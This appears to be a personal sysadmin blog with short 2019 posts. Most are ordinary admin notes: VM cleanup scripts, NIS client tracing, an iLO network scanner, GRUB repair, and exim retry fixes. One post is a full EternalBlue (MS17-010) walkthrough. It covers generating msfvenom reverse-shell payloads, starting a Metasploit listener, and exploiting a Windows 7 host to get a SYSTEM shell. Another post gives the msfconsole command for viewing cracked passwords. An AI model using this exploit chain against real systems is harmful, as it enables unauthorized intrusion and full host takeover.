Monday, November 25, 2019

clean up openbox failed purged vms 

#!/bin/bash
work=/home/uid/tmp
validvms=/home/uid/tmp/validvms
workclean=/home/uid/tmp/cleanvms
virtualboxvmsdir=/home/uid/VirtualBox\ VMs
box=$(hostname)
purgedate=$(date +"%m-%d-%Y")

# clean  up old work directories
rm -rf $work
mkdir $work

# find all vbox vms - not just running
# make the vbox vms into a list and remove
# extraneous information

vboxmanage list vms >> $validvms
cut -d '"' -f2 < $validvms >> $workclean

# change directory into where vbox vms reside

cd /home/uid/VirtualBox\ VMs
echo $purgeate >> $work/purgedvms-use
echo ".........................." >> $work/purgedvms-use
echo "start" >> $work/purgedvms-use
du -hsc >> $work/purgedvms-use

# exit if vbox vms directory is not found
if (($?>0)); then
    echo "cannot find virtualbox dir exiting"
    exit
fi

# grep is going through the validvm list
# if the line item is not found then it is deleted
# as each item is being deleted it is being captured
# in a file

for i in *; do
    if ! grep -qxFe "$i" $workclean; then
        echo "Deleting: $i"
        echo $i >> $work/purgedvms
        # the next line is commented out.  Test it.  Then uncomment to remove the files
        rm -rf "$i"
    fi
done

echo "finish" >> $work/purgedvms-use
du -hsc >> $work/purgedvms-use
echo ".........................." >> $work/purgedvms-use
sed -i '/total/d' $work/purgedvms-use


# here we email the results

cat $work/purgedvms-use $work/purgedvms > $work/purgedvms-union
mail -s "$box purged $purgedate" me@inhell < $work/purgedvms-union

exit
Posted by at No comments:

Thursday, November 21, 2019

2018 was a bad year 

find . -type d -ls -maxdepth 1 |grep '2018' | xargs rm -rf
Posted by at No comments:

Friday, November 15, 2019

who is accessing my nis server? 

 
 first, figure out the port the nis daemon (ypserv) is running on:  
   
 # rpcinfo -p|grep ypserv  
   100004  2  udp  951 ypserv  
   100004  1  udp  951 ypserv  
   100004  2  tcp  954 ypserv  
   100004  1  tcp  954 ypserv  
   
 gather up all the clients talking to the daemon:  
   
 # tcpdump -n -n port 951 or port 954  
   
 the output will look like this:  
   
 10:55:35.482333 IP 6.6.6.6.951 > 9.9.9.107.729: UDP, length 28  
 10:55:38.099478 IP 9.9.9.173.1013 > 6.6.6.6.951: UDP, length 64  
 10:55:38.099631 IP 6.6.6.6.951 > 9.9.9.173.1013: UDP, length 28  
 10:55:55.483328 IP 9.9.9.107.730 > 6.6.6.6.951: UDP, length 64  
 10:55:55.483491 IP 6.6.6.6.951 > 9.9.9.107.730: UDP, length 28  
 10:56:15.484442 IP 9.9.9.107.731 > 6.6.6.6.951: UDP, length 64  
 10:56:15.484747 IP 6.6.6.6.951 > 9.9.9.107.731: UDP, length 28  
 10:56:18.443343 IP 9.9.9.173.50256 > 6.6.6.6.951: UDP, length 140  
 10:56:18.443468 IP 6.6.6.6.951 > 9.9.9.173.50256: UDP, length 28  
 10:56:35.485748 IP 9.9.9.107.732 > 6.6.6.6.951: UDP, length 64  
 10:56:35.485920 IP 6.6.6.6.951 > 9.9.9.107.732: UDP, length 28  
   
 the ip address with 951 or 954 is the nis server.  
   
 in this case, our clients are:  
 9.9.9.107 & 9.9.9.173  
   
 what do if you don't have tcpdump? go straight to the source!  
 this nis server is older than dirt. good thing there are some old versions  
 of tcpdump and libpcap that are compatible with the kernel...  
   
 wget http://www.tcpdump.org/release/tcpdump-3.9.5.tar.gz  
 wget http://www.tcpdump.org/release/libpcap-0.9.6.tar.gz  
   
 tar xvfz and away you go.
Posted by at 1 comment:

Friday, October 4, 2019

find ilo 

 #!/bin/bash  
 #  
 # findilos - Search a local network segment for iLOs  
 #      The iLO is the Integrated Lights-Out management processor  
 #      used on HP ProLiant and BladeSystem servers  
 #  
 scriptversion="1.0"  
 #  
 # Author: iggy@nachotech.com  
 #  
 # Website: http://blog.nachotech.com  
 #  
 # Requires: tr sed expr curl nmap  
 #  
 # Tested with: Nmap 4.20, curl 7.17.1, RHEL4  
 #  
 # Note: Discovery of an iLO is dependent upon the Virtual Media port  
 #    being set to the default of 17988. If this has been changed  
 #    by the iLO administrator, then this script will NOT find it.  
 #  
 #    Also, if the iLO XML Reply Data Return has been Disabled by  
 #    the iLO administrator, this script will not be able to  
 #    gather any information about the server. It will still be  
 #    discovered, but all you will see is its IP address.  
 #  
   
 # GLOBAL VARIABLES  
   
 scriptname="findilos"  
 iloips="/tmp/tmpilos.$$"  
 iloxml="/tmp/tmpiloxml.$$"  
 ilohwvers="/tmp/tmpilohwvers.$$"  
   
 declare -i ilosfound=0  
   
 # FUNCTIONS  
   
 function parseiloxml {  
  fgrep "$1" $iloxml > /dev/null 2>&1  
  if [ $? -ne 0 ]  
  then  
   # tag not found in xml output, return empty string  
   parsedstring="N/A"  
  else  
   # tag was found - now we parse it from the output  
   tempstring=$( cat $iloxml | tr -d -c [:print:] | sed "s/^.*<$1>//" | sed "s/<.$1.*//")  
   # trim off leading and trailing whitespace  
   parsedstring=`expr match "$tempstring" '[ \t]*\(.*[^ \t]\)[ \t]*$'`  
  fi  
 }  
   
 function is_installed {  
  which $1 > /dev/null 2>&1  
  if [ $? -ne 0 ]  
  then  
   printf "\nERROR: %s not installed.\n\n" $1  
   exit 255  
  fi  
 }  
   
 # MAIN  
 # check for tools that we depend upon  
   
 is_installed tr  
 is_installed sed  
 is_installed expr  
 is_installed curl  
 is_installed nmap  
   
 # check syntax - should have 1 and only 1 parameter on cmdline  
   
 if [ $# -ne 1 ]; then  
  printf "%s %s ( http://blog.nachotech.com/ )\n" $scriptname $scriptversion  
  printf "Usage: %s {target network specification}\n" $scriptname  
  printf "TARGET NETWORK SPECIFICATION:\n"  
  printf " Can pass hostnames, IP addresses, networks, etc.\n"  
  printf " Ex: server1.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"  
  printf "EXAMPLE:\n"  
  printf " %s 16.32.64.0/22\n" $scriptname  
  exit 255  
 fi  
   
 iprange=$1  
   
 # prepare lookup file for iLO hardware versions  
   
 cat > $ilohwvers << EOF  
 iLO-1 shows hw version ASIC: 2  
 iLO-2 shows hw version ASIC: 7  
 i-iLO shows hw version T0  
 EOF  
   
 #  
 # scan a range of IP addresses looking for an  
 # open tcp port 17988 (the iLO virtual media port)  
 #  
   
 printf "Scanning..."  
   
 nmap -n -P0 -sS -p 17988 -oG - $iprange | fgrep /open/ | awk '{print $2}' > $iloips  
   
 printf "\n\n"  
   
 #  
 # open and read the list of IP addresses one at a time  
 #  
   
 exec 3< $iloips  
   
 echo "--------------- ------ -------- ------------ -------------------------"  
 echo "iLO IP Address iLO HW iLO FW  Server S/N  Server Model"  
 echo "--------------- ------ -------- ------------ -------------------------"  
   
 while read iloip <&3 ; do  
  ilosfound=$ilosfound+1  
  #  
  # attempt to read the xmldata from iLO, no password required  
  #  
  curl --proxy "" --fail --silent --max-time 3 http://$iloip/xmldata item=All > $iloxml  
   
  #  
  # parse out the Server model (server product name)  
  # from the XML output  
  #  
   
  parseiloxml SPN; servermodel=$parsedstring  
  parseiloxml SBSN; sernum=$parsedstring  
  parseiloxml PN;  ilotype=$parsedstring  
  parseiloxml FWRI; ilofirmware=$parsedstring  
  parseiloxml HWRI; ilohardware=$parsedstring  
   
  ilohwver=$(grep "$ilohardware" $ilohwvers|awk '{print $1}')  
  if [ "$ilohwver" == "" ]; then  
   ilohwver="N/A"  
  fi  
   
  if [ "$sernum" == "" ]; then  
   sernum="N/A"  
  fi  
   
  printf "%-15s %-6s %-8s %-12s %s\n" $iloip "$ilohwver" "$ilofirmware" "$sernum" "$servermodel"  
   
 done  
   
 printf "\n%d iLOs found on network target %s.\n\n" $ilosfound $iprange  
   
 rm -f $iloips $iloxml $ilohwvers  
   
 exit 0
Posted by at No comments:

Friday, August 16, 2019

autoblue is better than msfconsole sometimes 

 root@kali# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git        
 Cloning into 'AutoBlue-MS17-010'...                         
 remote: Enumerating objects: 1, done.                                     
 remote: Counting objects: 100% (1/1), done.                        
 remote: Total 72 (delta 0), reused 0 (delta 0), pack-reused 71  
 Unpacking objects: 100% (72/72), done.  
   
 root@kali# ./shell_prep.sh           
          _.-;;-._                            
      '-..-'|  ||  |                            
      '-..-'|_.-;;-._|                            
      '-..-'|  ||  |                              
      '-..-'|_.-''-._|                            
 Eternal Blue Windows Shellcode Compiler                     
                                          
 Let's compile them windoos shellcodezzz                     
                                          
 Compiling x64 kernel shellcode                                     
 Compiling x86 kernel shellcode                            
 kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)  
 Y                             
 LHOST for reverse connection:                       
 10.254.1.47                          
 LPORT you want x64 to listen on:                
 443  
 LPORT you want x86 to listen on:  
 445  
 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell  
 1                          
 Type 0 to generate a staged payload or 1 to generate a stageless payload  
 1                      
 Generating x64 cmd shell (stageless)...    
   
 msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=443  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x64 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 460 bytes  
 Saved as: sc_x64_msf.bin  
   
 Generating x86 cmd shell (stageless)...  
   
 msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=445  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x86 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 324 bytes  
 Saved as: sc_x86_msf.bin  
   
 MERGING SHELLCODE WOOOO!!!  
 DONE  
   
 root@kali# ./listener_prep.sh  
  __  
  /,-  
  ||)  
  \\_, )  
   `--'  
 Enternal Blue Metasploit Listener  
   
 LHOST for reverse connection:  
 10.254.1.47  
 LPORT for x64 reverse connection:  
 443  
 LPORT for x86 reverse connection:  
 445  
 Enter 0 for meterpreter shell or 1 for regular cmd shell:  
 1  
 Type 0 if this is a staged payload or 1 if it is for a stageless payload  
 1  
 Starting listener (stageless)...  
 [ ok ] Starting postgresql (via systemctl): postgresql.service.  
   
   
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
 MMMMMMMMMMM        MMMMMMMMMM  
 MMMN$              vMMMM  
 MMMNl MMMMM       MMMMM JMMMM  
 MMMNl MMMMMMMN    NMMMMMMM JMMMM  
 MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMNM  MMMMMMM  MMMMM jMMMM  
 MMMNI WMMMM  MMMMMMM  MMMM# JMMMM  
 MMMMR ?MMNM       MMMMM .dMMMM  
 MMMMNm `?MMM       MMMM` dMMMMM  
 MMMMMMN ?MM       MM? NMMMMMN  
 MMMMMMMMNe         JMMMMMNMMM  
 MMMMMMMMMMNm,      eMMMMMNMMNMM  
 MMMMNNMNMMMMMNx    MMMMMMNMMNMMNM  
 MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM  
     https://metasploit.com  
   
   
     =[ metasploit v5.0.6-dev              ]  
 + -- --=[ 1857 exploits - 1055 auxiliary - 327 post    ]  
 + -- --=[ 546 payloads - 44 encoders - 10 nops      ]  
 + -- --=[ 2 evasion                    ]  
   
 [*] Processing config.rc for ERB directives.  
 resource (config.rc)> use exploit/multi/handler  
 resource (config.rc)> set PAYLOAD windows/x64/shell_reverse_tcp  
 PAYLOAD => windows/x64/shell_reverse_tcp  
 resource (config.rc)> set LHOST 10.254.1.47  
 LHOST => 10.254.1.47  
 resource (config.rc)> set LPORT 443  
 LPORT => 443  
 resource (config.rc)> set ExitOnSession false  
 ExitOnSession => false  
 resource (config.rc)> set EXITFUNC thread  
 EXITFUNC => thread  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 0.  
 [*] Exploit completed, but no session was created.  
 resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp  
 [*] Started reverse TCP handler on 10.254.1.47:443  
 PAYLOAD => windows/shell/reverse_tcp  
 resource (config.rc)> set LPORT 445  
 LPORT => 445  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 1.  
 [*] Exploit completed, but no session was created.  
 [*] Starting persistent handler(s)...  
   
 [*] Started reverse TCP handler on 10.254.1.47:445  
 msf5 exploit(multi/handler) >   
   
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
   
 [*] Encoded stage with x86/shikata_ga_nai  
 [*] Sending encoded stage (267 bytes) to 10.1.1.13  
 [*] Command shell session 1 opened (10.254.1.47:445 -> 10.1.1.13:49173) at 2019-02-21 13:28:21 -0500  
   
 msf5 exploit(multi/handler) > sessions  
   
 Active sessions  
 ===============  
   
  Id Name Type        Information                                    Connection  
  -- ---- ----        -----------                                    ----------  
  1     shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.254.1.47:445 -> 10.1.1.13:49173 (10.1.1.13)  
   
 msf5 exploit(multi/handler) > sessions -i 1  
 [*] Starting interaction with 1...  
   
 More?  
 SR<@p  f%_?Mg??:6Zdx8}}(ks-cx_JwD`c@MWH?l hp6  
 The system cannot find the file specified.  
   
 C:\Windows\system32>whoami  
 whoami  
 nt authority\system
Posted by at No comments:

making an imitator like an original in ubuntu 

p2v isn't your friend and really you just want what you had before without all the junk.  you already backup /etc smart you.
how about figure out what packages you have and install them on your clone.

original # dpkg --get-selections  > pkglist
original # scp pkglist notme@imitator:/tmp

imitator # dpkg --set-selections < pkglist
imitator # apt-get dselect-upgrade
Posted by at No comments:

exim4 retry time not reached for any host 

 The relay is having a bad day. And it comes back online.  
 But /var/log/exim4/mainlog is spitting out:  
   
 "Exim error – retry time not reached for any host"  
   
 Okay.  
   
 # cd /var/spool/exim4/db  
 # rm -f retry retry.lockfile  
 # rm -f wait-remote_smtp wait-remote_smtp.lockfile  
 # service exim restart
Posted by at No comments:

Friday, May 3, 2019

what command do i use in msfconsole to see cracked passwords? 

msf5> creds
Posted by at No comments:

Monday, March 18, 2019

fix vmware converter disk fubar with kali 

 I decided to used VMWare Converter to convert a live Kali system to a VMWare VM. No joy.  
   
 My environment:  
   
 [system-to-convert]  
 # uname -a  
 # Linux kali2 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux  
 # less /etc/lsb-releases  
   
  DISTRIB_ID=Kali  
  DISTRIB_RELEASE=kali-rolling  
  DISTRIB_CODENAME=kali-rolling  
  DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"  
   
 [vmware vcenter converter standalone]  
 rev 6.2.0 build-8466193   
   
   
 After running a couple conversions, I consistently failure at 97% of the process completed, 
 and this error:  
   
  FAILED: An error occurred during the conversion: 'GrubInstaller::InstallGrub:   
  /usr/lib/vmware-converter/installGrub.sh failed with return code: 127, and message:   
  FATAL: kernel too old Error running vmware-updateGrub.sh through chroot into /mnt/p2v-src-root Command:  
  chroot "/mnt/p2v-src-root" /vmware-updateGrub.sh "GRUB2" "(hd0)" "(hd0,1)" /vmware-device.map 
  "grub2-install" '  
   
   
 This means the grub2-install portion of the conversion was having difficulty running.   
 Apparently the Kali system is using lv groups for its various disk partitions and   
 not a simpler /dev/sda1 &c. structure.  
   
 To repair the process I booted off of a Kali LiveCD (really any modern Ubuntu ISO would've 
 done the trick, too):  
   
 # apt-get install lvm2  
 # vgchange -a y  
 # lvscan  
   
  ACTIVE      '/dev/kali2-vg/root' [510.64 GiB] inherit  
  ACTIVE      '/dev/kali2-vg/swap_1' [47.99 GiB] inherit  
    
 # mount /dev/kali2-vg/root /mnt  
   
 # cat /mnt/etc/fstab  
   
  # /boot was on /dev/sda1 during installation  
  /dev/sda1 /boot      ext2  defaults    0    2  
  #UUID=c7c0cf46-3c64-4ceb-92d8-69d3906ab399 /boot      ext2  defaults    0    2  
   
  /dev/mapper/kali2--vg-root /        ext4  errors=remount-ro 0    1  
  /dev/mapper/kali2--vg-swap_1 none      swap  sw       0    0  
  /dev/sr0    /media/cdrom0  udf,iso9660 user,noauto   0    0  
   
 # mount /dev/sda1/boot /mnt/boot  
 # mount --bind /dev /mnt/dev  
 # mount --bind /proc /mnt/proc  
 # mount --bind /sys /mnt/sys  
 # chroot /mnt  
   
 # apt-get remove --purge grub-pc grub-common  
 # apt-get install grub-pc  
 # grub-mkconfig  
 # update-grub  
 # grub-install /dev/sda  
   
 # exit  
 # umount /mnt/sys  
 # sudo umount /mnt/dev  
 # sudo umount /mnt/proc  
 # sudo umount /mnt/boot  
 # sudo umount /mnt
Posted by at No comments:

Wednesday, February 13, 2019

convert image format on macosx 

tiff to jpg

for i in *.tiff; do sips -s format jpeg "$i" --out "${i%.*}.jpg"; done 
pdf to jpg
for i in *.pdf; do sips -s format jpeg "$i" --out "${i%.*}.jpg"; done
Posted by at 1 comment:
Subscribe to: Posts (Atom)